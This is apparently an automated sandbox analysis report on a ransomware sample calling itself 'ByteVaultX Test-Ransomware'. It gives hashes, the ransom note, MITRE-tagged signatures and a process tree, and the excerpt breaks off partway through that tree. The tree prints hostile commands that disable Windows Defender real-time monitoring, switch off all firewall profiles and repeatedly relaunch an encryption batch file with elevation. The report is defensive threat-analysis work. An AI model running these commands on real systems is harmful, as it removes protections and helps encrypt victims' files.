261ffc5a219a6a834eb57c4595b28912aa78f75eff32caa3d79d44c5ff400c60

Analysis

max time kernel
17s
max time network
138s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
25-05-2024 23:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
Size

9.9MB
MD5

396f35b1bdeb8dd81739eb7f2cc769d0
SHA1

d678bafbf8a85922cc9d38293c35a805844eeef3
SHA256

261ffc5a219a6a834eb57c4595b28912aa78f75eff32caa3d79d44c5ff400c60
SHA512

cf89004f3ff589589ecd00863c9a92dbb81375be3b1ef8e2231afe23c161b72a61c3a39de268486cfde0d1a1694a2fbac235075515df2b0e27dee12992e83bca
SSDEEP

196608:OhHFRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:MGFG8S1+TtIi+Y9Z8D8CclydoPx

Score

10^/10

evasion execution ransomware

Malware Config

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note

Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Encrypt\encrypt.bat	disable_win_def

Renames multiple (153) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 64 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
9276	netsh.exe
9648	netsh.exe
9536
4216	netsh.exe
8468	netsh.exe
5772	netsh.exe
9176
4408
6052	netsh.exe
6776
7592
8416
408	netsh.exe
5692	netsh.exe
10232	netsh.exe
9252	netsh.exe
6788
8900	netsh.exe
8176	netsh.exe
9600	netsh.exe
6288
8160	netsh.exe
9012	netsh.exe
6608	netsh.exe
9660
7592
9672
6076
4944	netsh.exe
6024	netsh.exe
5204	netsh.exe
9772	netsh.exe
9072	netsh.exe
1820	netsh.exe
4992
7432	netsh.exe
1552	netsh.exe
6428	netsh.exe
4076
6632	netsh.exe
6544	netsh.exe
6836	netsh.exe
6628	netsh.exe
3612
6252	netsh.exe
4944	netsh.exe
9616	netsh.exe
6304	netsh.exe
3988	netsh.exe
9660	netsh.exe
9484
7308	netsh.exe
6216
752
7228
3308	netsh.exe
8688	netsh.exe
9528
7968
7180	netsh.exe
7492
10080	netsh.exe
9332
8952

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

Loads dropped DLL 12 IoCs

Processes:

396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

pid	process
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

Drops desktop.ini file(s) 8 IoCs

Processes:

396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3580	powershell.exe
5704
7500	powershell.exe
3104
4648	powershell.exe
7560	powershell.exe
8464	powershell.exe
9684	powershell.exe
7492
10004
9976
7728
6808	powershell.exe
9640	powershell.exe
4840	powershell.exe
8692	powershell.exe
7356	powershell.exe
676	powershell.exe
3888
5288
7560	powershell.exe
9872
6412
8772
6504	powershell.exe
2848	powershell.exe
6664	powershell.exe
9064	powershell.exe
3160
2512
5132
5640
5768	powershell.exe
5492	powershell.exe
6252	powershell.exe
2512	powershell.exe
8128	powershell.exe
2420	powershell.exe
6856	powershell.exe
5592	powershell.exe
6192	powershell.exe
5576	powershell.exe
9656	powershell.exe
9968
5436
5544	powershell.exe
8120	powershell.exe
9828	powershell.exe
3524
6712	powershell.exe
9208	powershell.exe
6256	powershell.exe
9784	powershell.exe
7016	powershell.exe
4588	powershell.exe
2624	powershell.exe
396
5296
8000	powershell.exe
9988	powershell.exe
9772	powershell.exe
8732
9032
9520

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2428	powershell.exe
2428	powershell.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
4736	msedge.exe
4736	msedge.exe
3648	msedge.exe
3648	msedge.exe
464	powershell.exe
464	powershell.exe
464	powershell.exe
2288	powershell.exe
2288	powershell.exe
2288	powershell.exe
3836	powershell.exe
3836	powershell.exe
3836	powershell.exe
5108	powershell.exe
5108	powershell.exe
5108	powershell.exe
1652	powershell.exe
1652	powershell.exe
1652	powershell.exe
1736	powershell.exe
1736	powershell.exe
1736	powershell.exe
5256	powershell.exe
5256	powershell.exe
5256	powershell.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe
5652	powershell.exe
5652	powershell.exe
5676	powershell.exe
5676	powershell.exe
5652	powershell.exe
5676	powershell.exe
6024	powershell.exe
6024	powershell.exe
6008	powershell.exe
6008	powershell.exe
6008	powershell.exe
6024	powershell.exe
5440	powershell.exe
5440	powershell.exe
5440	powershell.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe
5500	powershell.exe
5500	powershell.exe
5500	powershell.exe
6052	powershell.exe
6052	powershell.exe
6052	powershell.exe
5412	powershell.exe
5412	powershell.exe
5412	powershell.exe
5336	powershell.exe
5336	powershell.exe
5452	powershell.exe
5452	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	5108	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	5256	powershell.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	5652	powershell.exe
Token: SeDebugPrivilege	5676	powershell.exe
Token: SeDebugPrivilege	6024	powershell.exe
Token: SeDebugPrivilege	6008	powershell.exe
Token: SeDebugPrivilege	5440	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	5500	powershell.exe
Token: SeDebugPrivilege	6052	powershell.exe
Token: SeDebugPrivilege	5412	powershell.exe
Token: SeDebugPrivilege	5336	powershell.exe
Token: SeDebugPrivilege	5452	powershell.exe
Token: SeDebugPrivilege	5456	powershell.exe
Token: SeDebugPrivilege	5688	powershell.exe
Token: SeDebugPrivilege	5784	powershell.exe
Token: SeDebugPrivilege	6016	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	3524	powershell.exe
Token: SeDebugPrivilege	5488	powershell.exe
Token: SeDebugPrivilege	5768	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	5412	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exemsedge.execmd.exenet.exe

description	pid	process	target process
PID 4092 wrote to memory of 1960	4092	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
PID 4092 wrote to memory of 1960	4092	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
PID 1960 wrote to memory of 2428	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	powershell.exe
PID 1960 wrote to memory of 2428	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	powershell.exe
PID 1960 wrote to memory of 2708	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	netsh.exe
PID 1960 wrote to memory of 2708	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	netsh.exe
PID 1960 wrote to memory of 3052	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	runas.exe
PID 1960 wrote to memory of 3052	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	runas.exe
PID 1960 wrote to memory of 3648	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	msedge.exe
PID 1960 wrote to memory of 3648	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	msedge.exe
PID 3648 wrote to memory of 4744	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 4744	3648	msedge.exe	msedge.exe
PID 1960 wrote to memory of 756	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	cmd.exe
PID 1960 wrote to memory of 756	1960	396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe	cmd.exe
PID 756 wrote to memory of 4740	756	cmd.exe	net.exe
PID 756 wrote to memory of 4740	756	cmd.exe	net.exe
PID 4740 wrote to memory of 4924	4740	net.exe	net.exe
PID 4740 wrote to memory of 4924	4740	net.exe	net.exe
PID 756 wrote to memory of 2288	756	cmd.exe	net.exe
PID 756 wrote to memory of 2288	756	cmd.exe	net.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3772	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 4736	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 4736	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 2784	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 2784	3648	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4092
- C:\Users\Admin\AppData\Local\Temp\396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe
  "C:\Users\Admin\AppData\Local\Temp\396f35b1bdeb8dd81739eb7f2cc769d0_NeikiAnalytics.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Drops desktop.ini file(s)
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- - C:\Windows\SYSTEM32\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    PID:2708
- - C:\Windows\SYSTEM32\runas.exe
    runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
    3⤵
    PID:3052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3648
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9a17446f8,0x7ff9a1744708,0x7ff9a1744718
      4⤵
      PID:4744
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
      4⤵
      PID:3772
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
      4⤵
      PID:2784
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
      4⤵
      PID:2528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
      4⤵
      PID:4064
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1
      4⤵
      PID:5156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
      4⤵
      PID:5936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
      4⤵
      PID:5652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
      4⤵
      PID:5912
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
      4⤵
      PID:6668
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,8228817906289612861,10572007258414801766,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5136 /prefetch:8
      4⤵
      PID:7772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\system32\net.exe
      net session
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4740
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        5⤵
        
        PID:4924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
      4⤵
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2288
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        5⤵
        
        PID:4800
      - C:\Windows\system32\net.exe
        
        net session
        6⤵
        
        PID:4604
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        7⤵
        
        PID:4436
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        6⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:464
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        7⤵
        
        PID:2064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1144
        
        C:\Windows\system32\net.exe
        
        net session
        8⤵
        
        PID:4032
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        9⤵
        
        PID:1960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        8⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
        
        C:\Windows\System32\cmd.exe
        
